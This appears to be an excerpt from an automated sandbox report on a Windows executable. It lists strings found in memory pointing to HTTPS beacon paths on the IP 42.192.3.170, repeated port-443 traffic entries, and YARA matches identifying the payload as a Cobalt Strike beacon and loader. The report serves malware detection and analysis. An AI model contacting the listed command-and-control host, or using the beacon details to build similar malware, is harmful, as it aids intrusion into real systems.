          Source: yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2950128022.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3271622558.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelHP
          Source: yZah650lHL.exe, 00000000.00000003.1739759155.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944932015.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1701127794.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelM
          Source: yZah650lHL.exe, 00000000.00000003.3308921920.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelP
          Source: yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelQ
          Source: yZah650lHL.exe, 00000000.00000002.4113948673.0000000000761000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelS
          Source: yZah650lHL.exe, 00000000.00000003.3031504097.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelXu
          Source: yZah650lHL.exe, 00000000.00000003.3328362680.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1739759155.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3347918530.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3369785762.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2894333153.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3250525186.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3448145276.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3467626542.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2950128022.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixela
          Source: yZah650lHL.exe, 00000000.00000003.3467626542.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelcs
          Source: yZah650lHL.exe, 00000000.00000003.3011079051.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelhK
          Source: yZah650lHL.exe, 00000000.00000003.1870269974.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3308921920.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelm
          Source: yZah650lHL.exe, 00000000.00000003.2913198165.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3211424591.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelp
          Source: yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelphy
          Source: yZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288485933.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1963443471.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2270174330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelq
          Source: yZah650lHL.exe, 00000000.00000003.1870269974.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3113705174.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelt
          Source: yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixeltem32
          Source: yZah650lHL.exe, 00000000.00000003.2495218353.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1944793809.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2058516201.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2077887934.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2364365771.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2232239149.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440036654.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2021019035.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420730874.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2345864498.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288370778.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2251319946.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039804636.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 
yZah650lHL.exe, 00000000.00000003.2572561886.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixeltz
          Source: yZah650lHL.exe, 00000000.00000003.3347918530.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2991067107.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3171943866.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3407302077.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3448145276.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelxJ
          Source: yZah650lHL.exe, 00000000.00000003.2251319946.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2288485933.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2345864498.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2402005752.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2420730874.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2306808221.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2325663976.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2364539586.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2270174330.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixely
          Source: yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/dpixelz
          Source: yZah650lHL.exe, 00000000.00000003.3230732408.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3250525186.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2476981159.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2856843273.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2458872458.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2495218353.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/nd-point:
          Source: yZah650lHL.exe, 00000000.00000003.2383203450.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixel
          Source: yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixel(
          Source: yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixel0
          Source: yZah650lHL.exe, 00000000.00000003.1739759155.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixel1b87bd06
          Source: yZah650lHL.exe, 00000000.00000003.3153029603.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixel9
          Source: yZah650lHL.exe, 00000000.00000003.2176453491.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2553907934.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2572561886.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixelLMEM8x
          Source: yZah650lHL.exe, 00000000.00000003.1758268591.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1794973018.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixelM
          Source: yZah650lHL.exe, 00000000.00000003.2021019035.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1982892951.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2002388791.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2039906619.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixelQ
          Source: yZah650lHL.exe, 00000000.00000003.2058516201.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/pixelq
          Source: yZah650lHL.exe, 00000000.00000003.1739905253.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1739847137.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719801648.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000002.4114142159.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1907581606.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3487466252.0000000000793000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1719918734.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1758268591.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1926725987.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/ptography
          Source: yZah650lHL.exe, 00000000.00000003.2270174330.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.2251319946.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/vide
          Source: yZah650lHL.exe, 00000000.00000003.2440141638.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.3427840081.0000000000793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/xel
          Source: yZah650lHL.exe, 00000000.00000003.1851666148.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1832985511.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1813737040.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1794973018.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, yZah650lHL.exe, 00000000.00000003.1776453698.00000000007EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://42.192.3.170/y
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
          Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
          Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
          Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
          Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
          Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
          Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
          Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
          Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
          Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
          Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
          Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
          Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
          Source: unknown, HTTPS traffic detected: 42.192.3.170:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 42.192.3.170:443 -> 192.168.2.4:50064 version: TLS 1.2

          System Summary

          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON, Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Identifies CobaltStrike via unidentified function code, Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Rule for beacon reflective loader, Author: unknown
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Meterpreter Beacon - file K5om.dll, Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects unmodified CobaltStrike beacon DLL, Author: yara@s3c.za.net
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Cobalt Strike sample from Leviathan report, Author: Florian Roth
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Cobalt Strike loader, Author: @VK_Intel
          Source: 0.2.yZah650lHL.exe.660000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Author: Florian Roth
